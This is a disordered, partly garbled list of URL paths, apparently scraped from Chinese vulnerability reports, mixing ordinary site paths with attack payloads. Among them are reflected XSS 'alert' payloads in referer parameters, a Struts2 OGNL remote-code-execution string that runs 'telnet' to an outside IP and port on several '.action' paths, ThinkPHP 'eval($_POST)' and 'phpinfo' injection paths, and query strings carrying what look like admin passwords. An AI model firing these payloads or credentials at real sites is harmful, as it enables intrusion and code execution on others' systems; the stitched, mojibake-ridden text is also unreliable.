/zhuantiDetail.aspx?ID=1844 /ncenterDetail1.aspx?ID=1842 /expertNew.aspx?ColumnId=85 /serviceCustomer.aspx?ChannelId=10&ColumnId=89 /productTechnique.aspx?ChannelId=7&ColumnId=78 /rdzt/show.jsp?id=501 12320WEB /manage/download.jsp?filepath= /manage/login.jsp /jmx-console/可利用void /) /register/verify /manage/download.jsp?filepath=manage/login.jsp /manage/fujian.jsp / /crm/logon /#hl=zh-CN&newwindow=1&safe=strict&q=%E8%81%94%E7%B3%BB++%4036kr.com&oq=%E8%81%94%E7%B3%BB++%4036kr.com&aq=f&aqi=&aql=&gs_l=serp.12...0.0.7.845297.0.0.0.0.0.0.0.0..0.0.erf1..0.0.UaAQm4euGag&bav=on.2,or.r_gc.r_pw.,cf.osb&fp=c05da0994da9ff65&biw=1252&bih=567 /od /crm/logon /sdo/Login/LoginFrameFC.php?appId=207&areaId=1&loginifrmId=iframeLogin&proxyUrl=http://www.sdo.com/proxy.html&returnURL=http://iq.sdo.com&backUrl=http://iq.sdo.com&CSSURL=http://iq.sdo.com/Style/IframeLogin.css&username=&password=&templateId= //login.sdo.com/sdo/Login/LoginSDO.php?service=http://iq.sdo.com&encryptFlag=0 /sdo/Login/LoginFrameFC.php?appId=207&areaId=1&loginifrmId=iframeLogin&proxyUrl=http://www.sdo.com/proxy.html&returnURL=http://iq.sdo.com&backUrl=http://iq.sdo.com&CSSURL=http://iq.sdo.com/Style/IframeLogin.css&username=&password=&templateId=&sdid= //login.sdo.com/sdo/Login/LoginSDO.php?service=http://iq.sdo.com&encryptFlag=0 /sdo/Login/LoginFrameFC.php?appId=207&areaId=1&loginifrmId=iframeLogin&proxyUrl=http://www.sdo.com/proxy.html&returnURL=http://iq.sdo.com&backUrl=http://iq.sdo.com&CSSURL=http://iq.sdo.com/Style/IframeLogin.css&username=&password=&templateId=&sdid=&infoEx= //login.sdo.com/sdo/Login/LoginSDO.php?service=http://iq.sdo.com&encryptFlag=0 /sdo/Login/LoginFrameFC.php?appId=207&areaId=1&loginifrmId=iframeLogin&proxyUrl=http://www.sdo.com/proxy.html&returnURL=http://iq.sdo.com&backUrl=http://iq.sdo.com&CSSURL=http://iq.sdo.com/Style/IframeLogin.css&username=&password=&templateId=&sdid=&infoEx=&uid= //login.sdo.com/sdo/Login/LoginSDO.php?service=http://iq.sdo.com&encryptFlag=0 /sdo/Login/LoginFrameFC.php?appId=207&areaId=1&loginifrmId=iframeLogin&proxyUrl=http://www.sdo.com/proxy.html&returnURL=http://iq.sdo.com&backUrl=http://iq.sdo.com&CSSURL=http://iq.sdo.com/Style/IframeLogin.css&username=&password=&templateId=&sdid=&infoEx=&uid=&appArea=1&service=http://iq.sdo.com&code=2&pageType= /sdo/Login/LoginSDO.php?service=http://iq.sdo.com&encryptFlag=0 /sdohelp.ashx?gameid=200012500&area=4000&type=3&maxlen=10&maxnum=4&src= /gaea/phone_default.aspx?from=121&zone= /gaea/phone_default.aspx?from=121&zone=nav&ptType= /gaea/phone_default.aspx?from=121&zone=nav&ptType=2®sdid= /bbs/?formhash=ba4a947f&referer=%22%3E%3Cscript%3Ealert%287161522%29%3B%3C/script%3E&cookietime=2592000 /gaea/phone_default.aspx?from=121&zone=nav&ptType=2®sdid=&chksdid= /gaea/phone_default.aspx?from=121&zone=nav&ptType=2®sdid=&chksdid=false&hidRecName001= /gaea/phone_default.aspx?from=121&zone=nav&ptType=2®sdid=&chksdid=false&hidRecName001=&hidRecName002= /gaea/phone_default.aspx?from=121&zone=nav&ptType=2®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001= /gaea/phone_default.aspx?from=121&zone=nav&ptType=2®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002= /gaea/phone_default.aspx?from=121&zone=nav&ptType=2®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck= /gaea/phone_default.aspx?from=121&zone=nav&ptType=2®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom= /gaea/phone_default.aspx?from=121&zone=nav&ptType=2®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone= /gaea/phone_default.aspx?from=121&zone=nav&ptType=2®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=nav&sessionid= /gaea/phone_default.aspx?from=121&zone=nav&ptType=2®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=nav&sessionid=&goldtype= /gaea/phone_default.aspx?from=121&zone=nav&ptType=2®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=nav&sessionid=&goldtype=&partner= /gaea/phone_default.aspx?from=121&zone=nav&ptType=2®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=nav&sessionid=&goldtype=&partner=&apptype= /gaea/phone_default.aspx?from=121&zone=nav&ptType=2®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=nav&sessionid=&goldtype=&partner=&apptype=&agent= /gaea/phone_default.aspx?from=121&zone=nav&ptType=2®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=nav&sessionid=&goldtype=&partner=&apptype=&agent=&ctype= /cas/loginStateService?method= /gaea/phone_default.aspx?from=121&zone=nav&ptType=2®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=nav&sessionid=&goldtype=&partner=&apptype=&agent=&ctype=&hidExinfo= /sdo/Login/LoginFrame.php?appDomain=tuita.com&appId= /gaea/phone_default.aspx?from=121&zone=nav&ptType=2®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=nav&sessionid=&goldtype=&partner=&apptype=&agent=&ctype=&hidExinfo=&qqaccount= /sdo/Login/LoginFrame.php?appDomain=tuita.com&appId=256&appArea= /gaea/phone_default.aspx?from=121&zone=nav&ptType=2®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=nav&sessionid=&goldtype=&partner=&apptype=&agent=&ctype=&hidExinfo=&qqaccount=&attcode2= /gaea/phone_default.aspx?from=121&zone=nav&ptType=2®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=nav&sessionid=&goldtype=&partner=&apptype=&agent=&ctype=&hidExinfo=&qqaccount=&attcode2=123456&showPTInfoSection= /gaea/phone_default.aspx?from=121&zone=nav&ptType=2®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=nav&sessionid=&goldtype=&partner=&apptype=&agent=&ctype=&hidExinfo=&qqaccount=&attcode2=123456&showPTInfoSection=&vendorPhoneId= /gaea/phone_default.aspx?from=121&zone=nav&ptType=2®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=nav&sessionid=&goldtype=&partner=&apptype=&agent=&ctype=&hidExinfo=&qqaccount=&attcode2=123456&showPTInfoSection=&vendorPhoneId=&modelPhoneId= /sdo/Login/LoginFrame.php?appDomain=tuita.com&appId=256&appArea=0&returnURL=http://www.tuita.com/login?refer=&CSSURL=http://www.tuita.com/html/login/css/IframeLogin.css?20150524184201&autologinchecked=1&autologintime=14&autologintext=涓嬫鑷姩鐧诲綍&autologinwaitingmsg=鑷姩鐧诲綍涓�...&curURL=http://www.tuita.com/login?refer=&usernamePlaceHolder=鎵嬫満/閭/涓€у寲甯愬彿&username=&password=&templateId= /login?refer=&code=2&pageType=0&autoLogin=&saveTime=14&loginCustomerUrl=http://www.tuita.com/login?refer=&encryptFlag=0 /cas/login?service= /sdo/Login/LoginFrame.php?appDomain=tuita.com&appId=256&appArea=0&returnURL=http://www.tuita.com/login?refer=&CSSURL=http://www.tuita.com/html/login/css/IframeLogin.css?20150524184201&autologinchecked=1&autologintime=14&autologintext=涓嬫鑷姩鐧诲綍&autologinwaitingmsg=鑷姩鐧诲綍涓�...&curURL=http://www.tuita.com/login?refer=&usernamePlaceHolder=鎵嬫満/閭/涓€у寲甯愬彿&username=&password=&templateId=&sdid= /login?refer=&code=2&pageType=0&autoLogin=&saveTime=14&loginCustomerUrl=http://www.tuita.com/login?refer=&encryptFlag=0 /sdo/Login/LoginFrame.php?appDomain=tuita.com&appId=256&appArea=0&returnURL=http://www.tuita.com/login?refer=&CSSURL=http://www.tuita.com/html/login/css/IframeLogin.css?20150524184201&autologinchecked=1&autologintime=14&autologintext=涓嬫鑷姩鐧诲綍&autologinwaitingmsg=鑷姩鐧诲綍涓�...&curURL=http://www.tuita.com/login?refer=&usernamePlaceHolder=鎵嬫満/閭/涓€у寲甯愬彿&username=&password=&templateId=&sdid=&infoEx= /login?refer=&code=2&pageType=0&autoLogin=&saveTime=14&loginCustomerUrl=http://www.tuita.com/login?refer=&encryptFlag=0 /sdo/Login/LoginFrame.php?appDomain=tuita.com&appId=256&appArea=0&returnURL=http://www.tuita.com/login?refer=&CSSURL=http://www.tuita.com/html/login/css/IframeLogin.css?20150524184201&autologinchecked=1&autologintime=14&autologintext=涓嬫鑷姩鐧诲綍&autologinwaitingmsg=鑷姩鐧诲綍涓�...&curURL=http://www.tuita.com/login?refer=&usernamePlaceHolder=鎵嬫満/閭/涓€у寲甯愬彿&username=&password=&templateId=&sdid=&infoEx=&uid= /login?refer=&code=2&pageType=0&autoLogin=&saveTime=14&loginCustomerUrl=http://www.tuita.com/login?refer=&encryptFlag=0 /sdo/Login/LoginFrame.php?appDomain=tuita.com&appId=256&appArea=0&returnURL=http://www.tuita.com/login?refer=&CSSURL=http://www.tuita.com/html/login/css/IframeLogin.css?20150524184201&autologinchecked=1&autologintime=14&autologintext=涓嬫鑷姩鐧诲綍&autologinwaitingmsg=鑷姩鐧诲綍涓�...&curURL=http://www.tuita.com/login?refer=&usernamePlaceHolder=鎵嬫満/閭/涓€у寲甯愬彿&username=&password=&templateId=&sdid=&infoEx=&uid=&service=http://www.tuita.com/login?refer=&code=2&pageType= /login?refer=&encryptFlag=0 /Partner/PromotionList.aspx?type= /knowledge/ClassShow/11690?queryString= /knowledge/ClassShow/11689?queryString= /knowledge/ClassShow/11690?queryString=1&idx= /knowledge/ClassShow/11688?queryString= /knowledge/ClassShow/11687?queryString= /knowledge/ClassShow/11695?queryString= /knowledge/ClassShow/11689?queryString=1&idx= /knowledge/ClassShow/11688?queryString=1&idx= /knowledge/ClassShow/11695?queryString=1&idx= /knowledge/ClassShow/11687?queryString=1&idx= /knowledge/ClassShow/11693?queryString= /knowledge/ClassShow/11693?queryString=1&idx= /knowledge/ClassShow/12569?queryString= /knowledge/ClassShow/12569?queryString=1&idx= /knowledge/ClassShow/11578?queryString= /knowledge/ClassShow/11583?queryString= /knowledge/ClassShow/11584?queryString=1&idx= /knowledge/ClassShow/11578?queryString=1&idx= /knowledge/ClassShow/11583?queryString=1&idx= /gaea/input_pt.aspx?from=121&zone= /gaea/phone_overseas.aspx?from= /gaea/phone_overseas.aspx?from=121&zone= /gaea/phone_overseas.aspx?from=121&zone=nav&ptType= /gaea/phone_overseas.aspx?from=121&zone=nav&ptType=1®sdid= /gaea/phone_overseas.aspx?from=121&zone=nav&ptType=1®sdid=&chksdid= /gaea/phone_overseas.aspx?from=121&zone=nav&ptType=1®sdid=&chksdid=false&hidRecName001= /gaea/phone_overseas.aspx?from=121&zone=nav&ptType=1®sdid=&chksdid=false&hidRecName001=&hidRecName002= /gaea/phone_overseas.aspx?from=121&zone=nav&ptType=1®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001= /gaea/phone_overseas.aspx?from=121&zone=nav&ptType=1®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002= /gaea/phone_overseas.aspx?from=121&zone=nav&ptType=1®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck= /gaea/phone_overseas.aspx?from=121&zone=nav&ptType=1®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom= /gaea/phone_overseas.aspx?from=121&zone=nav&ptType=1®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone= /gaea/phone_overseas.aspx?from=121&zone=nav&ptType=1®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=&sessionid= /gaea/phone_overseas.aspx?from=121&zone=nav&ptType=1®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=&sessionid=&goldtype= /gaea/phone_overseas.aspx?from=121&zone=nav&ptType=1®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=&sessionid=&goldtype=&partner= /gaea/phone_overseas.aspx?from=121&zone=nav&ptType=1®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=&sessionid=&goldtype=&partner=&apptype= /gaea/phone_overseas.aspx?from=121&zone=nav&ptType=1®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=&sessionid=&goldtype=&partner=&apptype=&agent= /gaea/phone_overseas.aspx?from=121&zone=nav&ptType=1®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=&sessionid=&goldtype=&partner=&apptype=&agent=&ctype= /gaea/phone_overseas.aspx?from=121&zone=nav&ptType=1®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=&sessionid=&goldtype=&partner=&apptype=&agent=&ctype=&hidExinfo= /gaea/phone_overseas.aspx?from=121&zone=nav&ptType=1®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=&sessionid=&goldtype=&partner=&apptype=&agent=&ctype=&hidExinfo=&qqaccount= /gaea/phone_overseas.aspx?from=121&zone=nav&ptType=1®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=&sessionid=&goldtype=&partner=&apptype=&agent=&ctype=&hidExinfo=&qqaccount=&showPTInfoSection= /bbs/index.php?formhash=ba4a947f&referer=%22%3E%3Cscript%3Ealert%287151867%29%3B%3C/script%3E&cookietime=2592000 /bbs/register.php?formhash=ba4a947f&referer=%22%3E%3Cscript%3Ealert%282564266%29%3B%3C/script%3E&cookietime=2592000 /bbs/memcp.php?formhash=ba4a947f&referer=%22%3E%3Cscript%3Ealert%285235041%29%3B%3C/script%3E&cookietime=2592000 /bbs/medal.php?formhash=ba4a947f&referer=%22%3E%3Cscript%3Ealert%283273439%29%3B%3C/script%3E&cookietime=2592000 /bbs/stats.php?formhash=ba4a947f&referer=%22%3E%3Cscript%3Ealert%286380139%29%3B%3C/script%3E&cookietime=2592000 /bbs/member.php?action=lostpasswd&formhash=ba4a947f&referer=%22%3E%3Cscript%3Ealert%286380139%29%3B%3C/script%3E&cookietime=2592000 /bbs/2fly_gift.php?formhash=ba4a947f&referer=%22%3E%3Cscript%3Ealert%282847615%29%3B%3C/script%3E&cookietime=2592000 /bbs/forumdisplay.php?fid=24&formhash=ba4a947f&referer=%22%3E%3Cscript%3Ealert%282950003%29%3B%3C/script%3E&cookietime=2592000 /knowledge/ClassShow/13045?queryString= /knowledge/ClassShow/13046?queryString= /knowledge/ClassShow/13047?queryString= /knowledge/ClassShow/13048?queryString= /knowledge/ClassShow/13045?queryString=1&idx= /knowledge/ClassShow/13049?queryString= /knowledge/ClassShow/13047?queryString=1&idx= /knowledge/ClassShow/13046?queryString=1&idx= /knowledge/ClassShow/13048?queryString=1&idx= /knowledge/ClassShow/13049?queryString=1&idx= /knowledge/ClassShow/13063?queryString= /knowledge/ClassShow/13064?queryString= /knowledge/ClassShow/13068?queryString= /knowledge/ClassShow/13070?queryString= /knowledge/ClassShow/13063?queryString=1&idx= /knowledge/ClassShow/13064?queryString=1&idx= /knowledge/ClassShow/13072?queryString= /knowledge/ClassShow/13067?queryString= /knowledge/ClassShow/13071?queryString= /knowledge/ClassShow/13068?queryString=1&idx= /knowledge/ClassShow/13072?queryString=1&idx= /knowledge/ClassShow/13089?queryString= /knowledge/ClassShow/13067?queryString=1&idx= /knowledge/ClassShow/13093?queryString= /knowledge/ClassShow/13091?queryString= /knowledge/ClassShow/13071?queryString=1&idx= /knowledge/ClassShow/13092?queryString= /knowledge/ClassShow/13088?queryString= /knowledge/ClassShow/13094?queryString= /knowledge/ClassShow/13090?queryString= /knowledge/ClassShow/13089?queryString=1&idx= /knowledge/ClassShow/13091?queryString=1&idx= /knowledge/ClassShow/13093?queryString=1&idx= /knowledge/ClassShow/13095?queryString= /knowledge/ClassShow/13092?queryString=1&idx= /knowledge/ClassShow/13088?queryString=1&idx= /knowledge/ClassShow/13090?queryString=1&idx= /knowledge/ClassShow/13094?queryString=1&idx= /knowledge/ClassShow/13085?queryString= /knowledge/ClassShow/13087?queryString= /knowledge/ClassShow/13070?queryString=1&idx= /knowledge/ClassShow/13095?queryString=1&idx= /knowledge/ClassShow/13082?queryString= /knowledge/ClassShow/13080?queryString= /knowledge/ClassShow/13078?queryString= /knowledge/ClassShow/13083?queryString= /knowledge/ClassShow/13079?queryString= /knowledge/ClassShow/13085?queryString=1&idx= /knowledge/ClassShow/13087?queryString=1&idx= /knowledge/ClassShow/13075?queryString= /knowledge/ClassShow/13076?queryString= /knowledge/ClassShow/13082?queryString=1&idx= /knowledge/ClassShow/13080?queryString=1&idx= /knowledge/ClassShow/13078?queryString=1&idx= /knowledge/ClassShow/12545?queryString= /knowledge/ClassShow/13076?queryString=1&idx= /knowledge/ClassShow/13075?queryString=1&idx= /knowledge/ClassShow/12548?queryString= /knowledge/ClassShow/13077?queryString= /knowledge/ClassShow/12554?queryString= /knowledge/ClassShow/12545?queryString=1&idx= /knowledge/ClassShow/12549?queryString= /knowledge/ClassShow/13079?queryString=1&idx= /knowledge/ClassShow/13083?queryString=1&idx= /knowledge/ClassShow/12555?queryString= /knowledge/ClassShow/13077?queryString=1&idx= /knowledge/ClassShow/12554?queryString=1&idx= /knowledge/ClassShow/12548?queryString=1&idx= /knowledge/ClassShow/13074?queryString= /knowledge/ClassShow/12556?queryString= /knowledge/ClassShow/13052?queryString= /knowledge/ClassShow/13058?queryString= /knowledge/ClassShow/13074?queryString=1&idx= /knowledge/ClassShow/13056?queryString= /knowledge/ClassShow/13055?queryString= /knowledge/ClassShow/13052?queryString=1&idx= /knowledge/ClassShow/13057?queryString= /knowledge/ClassShow/13060?queryString= /knowledge/ClassShow/13061?queryString= /knowledge/ClassShow/13058?queryString=1&idx= /knowledge/ClassShow/13062?queryString= /knowledge/ClassShow/12556?queryString=1&idx= /knowledge/ClassShow/12555?queryString=1&idx= /knowledge/ClassShow/13056?queryString=1&idx= /edit/index/27699001?referenceName[]= /knowledge/ClassShow/13055?queryString=1&idx= /knowledge/ClassShow/13061?queryString=1&idx= /knowledge/ClassShow/13057?queryString=1&idx= /knowledge/ClassShow/13060?queryString=1&idx= /knowledge/ClassShow/12549?queryString=1&idx= /knowledge/ClassShow/13059?queryString= /edit/index/27699001?referenceName[]=&referenceUrl[]= /knowledge/ClassShow/13062?queryString=1&idx= /edit/index/27699001?referenceName[]=&referenceUrl[]=&hidTitle= /knowledge/ClassShow/13059?queryString=1&idx= /edit/index/27699001?referenceName[]=&referenceUrl[]=&hidTitle=銆愮嫭瀹躲€戝僵铏圭綉鍒嗕韩鍐呭璧㈠鍔�&hidClassID=20023&hidOriginalClassID= /knowledge/ClassShow/11997?queryString= /knowledge/ClassShow/11997?queryString=1&idx= /edit/index/27699001?referenceName[]=&referenceUrl[]=&hidTitle=銆愮嫭瀹躲€戝僵铏圭綉鍒嗕韩鍐呭璧㈠鍔�&hidClassID=20023&hidOriginalClassID=20023&hidKnowLedgeType= /knowledge/ClassShow/12000?queryString= /knowledge/ClassShow/12000?queryString=1&idx= /edit/index/27699001?referenceName[]=&referenceUrl[]=&hidTitle=銆愮嫭瀹躲€戝僵铏圭綉鍒嗕韩鍐呭璧㈠鍔�&hidClassID=20023&hidOriginalClassID=20023&hidKnowLedgeType=1&hidReference= /edit/index/27699001?referenceName[]=&referenceUrl[]=&hidTitle=銆愮嫭瀹躲€戝僵铏圭綉鍒嗕韩鍐呭璧㈠鍔�&hidClassID=20023&hidOriginalClassID=20023&hidKnowLedgeType=1&hidReference=&originalReferenceMedia= /admin/ /admin/ /200909/admin/ /wp-login.php /index.php /manage/ /search.aspx?categoryid=%27%22%27%22%29%3b%7c%5d*%7b%250d%250a%3C%2500%3E&categoryname=%E8%89%BA%E6%9C%AF&page=4&searchtype=ebook /sdodownload/passport/SNDAHomepage/SNDANavigator.aspx?From=1000Y.SDO.COM&Panel=HOME_NEWSBAR&To=http://www.wooyun.org /ssologin.aspx?a=a&CasBackUrl=http://wooyun.org www.tiwte.ac.cn www.tjhcz.com.cn) /tpxw/201205/t20120510_2293603.htm /2304731083/ykoBnDgJM?type=repost /c?m=9d78d513d9801bf94fece4690d61c0676901dd272bd6a0027fa38449e33507550026bdb47d645646c4c40f7a1cec130afdf041276a4737b7ec99d457&p=85769a448e8011a05debca314d0d&user=baidu&fm=sc&query=qhd%2Egov%2Ecn&qid=c7365c2b38e34fb4&p1=1 /testqwe456iuut.jsp /getMailByUserName_iiut.jsp /registeruserhandly.jsp?pass=059258 /getUserByUserName_iiut.jsp /getUserDetail_iuwkk.jsp?password=uid54pok009&usernames=admin /get.jsp?username=admin&password=hxp943761 /commons/paylog.do /index.php?controller=default&action=works&orderby=abs /pvzsocial/?origin= /chuanzhang/?origin= /paopaoyu/?origin= /dandanlong/?origin= /qjiangsanguo/?origin= /littlewar?origin= /boyaa_texas/?origin= /rongcar/?origin= /smsanguo/?origin= /paopaoyu/?origin= /qjiangsanguo/?origin= /myprincess/?origin= /manorage/?origin= /hongsejingjie?origin= /weisanguo?origin= /friendetective?origin= /bj/golden/community-2012?pi= /movie/index.action?%28%27\u0023_memberAccess[\%27allowStaticMethodAccess\%27]%27%29%28meh%29=true&%28aaa%29%28%28%27\u0023context[\%27xwork.MethodAccessor.denyMethodExecution\%27]\u003d\u0023foo%27%29%28\u0023foo\u003dnew%20java.lang.Boolean%28%22false%22%29%29%29&%28asdf%29%28%28%27\u0023rt.exec%28%22%20telnet%2059.39.101.13%2012345%20%22%29%27%29%28\u0023rt\u003d@java.lang.Runtime@getRuntime%28%29%29%29=1 /admin/ /whzfhf/index.action?%28%27\u0023_memberAccess[\%27allowStaticMethodAccess\%27]%27%29%28meh%29=true&%28aaa%29%28%28%27\u0023context[\%27xwork.MethodAccessor.denyMethodExecution\%27]\u003d\u0023foo%27%29%28\u0023foo\u003dnew%20java.lang.Boolean%28%22false%22%29%29%29&%28asdf%29%28%28%27\u0023rt.exec%28%22%20telnet%2059.39.101.13%2012345%20%22%29%27%29%28\u0023rt\u003d@java.lang.Runtime@getRuntime%28%29%29%29=1 /index.action?%28%27\u0023_memberAccess[\%27allowStaticMethodAccess\%27]%27%29%28meh%29=true&%28aaa%29%28%28%27\u0023context[\%27xwork.MethodAccessor.denyMethodExecution\%27]\u003d\u0023foo%27%29%28\u0023foo\u003dnew%20java.lang.Boolean%28%22false%22%29%29%29&%28asdf%29%28%28%27\u0023rt.exec%28%22%20telnet%2059.39.101.13%2012345%20%22%29%27%29%28\u0023rt\u003d@java.lang.Runtime@getRuntime%28%29%29%29=1 //127.0.0.1/moc.udiab.www www.baidu.com/1.0.0.721//:ptth那么在某些大公会或者万人群发送则如下图: /pwd/xxxxxx%3Cscript%3Ealert(%22XSS%22)%3C/script%3E /index.php/article/view/aid/$%7B@eval%28$_POST%5Bf%5D%29%7D /THinkphp/oday.php /ajax/2011.php /admin/ /it/detail_2012_05/27/14839402_0.shtml /jsp/admin/ewebeditor/admin/login.jsp /set/submit/theme /set/submit/theme /pub/submit/modifytext /m.js' /news/newslistleader?leader=1 /center/pages/download.jsp?path=uploads%5C2011%5C11%5C28%5C1133252150510.doc&name=%C5%E7%CB%AE%C3%F0%BB%F0%B2%FA%C6%B7.doc /standard/result/paymentResult.htm?isSettleSuccess=true&depositId=2011080757367455&outBizNo=2011080701976855&settleStatus=S&bizIdentity=trade30001&orderId=7f2c492f1d4dbd5b9399287470ae9c16&signData=817a3ed0e6fcea78a91046b204689827 /standard/result/paymentResult.htm?isSettleSuccess=true&depositId=2011113031140082&outBizNo=2011113068080882&settleStatus=S&bizIdentity=trade30001&orderId=79fcecb20058c85cecdaae6c7a714802&signData=849f245f8eb4af5744bf6c828a69cdea /standard/result/paymentResult.htm?isSettleSuccess=true&depositId=2011112090032338&outBizNo=2011112017277138&settleStatus=S&bizIdentity=trade30001&orderId=1055787abc3a58a92c2b46ce4a717ea3&signData=f9b313cb90033b89aeac126a92e22eaa /standard/result/paymentResult.htm?isSettleSuccess=true&depositId=2011082552069093&outBizNo=2011082511373193&settleStatus=S&bizIdentity=trade30001&orderId=7adcacac85911e25163023b46a4ed737&signData=623dad933f6bf6b1041f70f73eaedc3b /standard/result/paymentResult.htm?isSettleSuccess=true&depositId=2011101324041849&settleStatus=S&errorMsg=&signData=37061723d1268067aa68c294b7baae6a&merVAR=¬ifyData=PD94bWwgIHZlcnNpb249IjEuMCIgZW5jb2Rpbmc9IkdCSyIgc3 /standard/result/paymentResult.htm?isSettleSuccess=true&depositId=2011121292986160&settleStatus=S&errorMsg=&signData=d135f6731821523eec72f34cef143572&merVAR=¬ifyData=PD94bWwgIHZlcnNpb249IjEuMCIgZW5jb2Rpbmc9IkdCSyIgc3 /standard/result/paymentResult.htm?settleStatus=S&isSettleSuccess=true&depositId=2011031974521180&outBizNo=2011031997740292&bizIdentity=trade30001&orderId=524be3b0711a12b3c9f76c709d839ba3&signData=37e41e2ff3037eca31a01e6f22df5203 /standard/result/paymentResult.htm?settleStatus=S&isSettleSuccess=true&depositId=2012052122395041&outBizNo=2012052159566141&bizIdentity=trade30001&orderId=0521cd2cb9db166d38833c0100571418&signData=2d7d60babacbcb514815fd998bed95ee /standard/result/paymentResult.htm?settleStatus=S&isSettleSuccess=true&depositId=2012052122395041&outBizNo=2012052159566141&bizIdentity=trade30001&orderId=0521cd2cb9db166d38833c0100571418&signData=2d7d60babacbcb514815fd998bed95ee /standard/result/paymentResult.htm?isSettleSuccess=true&depositId=2012022599555295&outBizNo=2012022472986595&settleStatus=S&bizIdentity=trade30001&orderId=f8b38c82599b7933c586160029503063&signData=038f19b006a24fa889b4aaa693a2bc76 /standard/result/paymentResult.htm?isSettleSuccess=true&depositId=2012010963115297&outBizNo=2012010922053897&settleStatus=S&bizIdentity=trade30001&orderId=d0b4a40c48ee8e6571017de0bfa3063b&signData=c51ec7c214d5b670f9cc25c2aea8b140 /standard/result/paymentResult.htm?isSettleSuccess=true&depositId=2011113031140082&outBizNo=2011113068080882&settleStatus=S&bizIdentity=trade30001&orderId=79fcecb20058c85cecdaae6c7a714802&signData=849f245f8eb4af5744bf6c828a69cdea /standard/result/paymentResult.htm?isSettleSuccess=true&depositId=2011121292986160&settleStatus=S&errorMsg=&signData=d135f6731821523eec72f34cef143572&merVAR=¬ifyData=PD94bWwgIHZlcnNpb249IjEuMCIgZW5jb2Rpbmc9IkdCSyIgc3 /standard/result/paymentResult.htm?isSettleSuccess=true&depositId=2011111650698047&outBizNo=201111162940116&settleStatus=S&bizIdentity=puc10002&orderId=e2f6b9ff378ec02b2abb12e99523fbf9&signData=7930d106a973ba1df40c391055bad916 history中存在xss漏洞,即浏览历史中url链接中存在明显的xss漏洞。 /1.html#\ history,就可以看到效果了 history /client/register?aid=register_index110421s /kohlerkitchens/player.php?pid=76,存储型xss地址 /web/userinfo.jsp //www.kndie.com,点击后,URL拦截 /%3C%2F%61%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%27%58%53%53%27%29%3C%2F%73%63%72%69%70%74%3E%3C%2F%61%3E,然后发送出去,再次点击。 /index.php/module/action/param1/$%7B@phpinfo()%7D 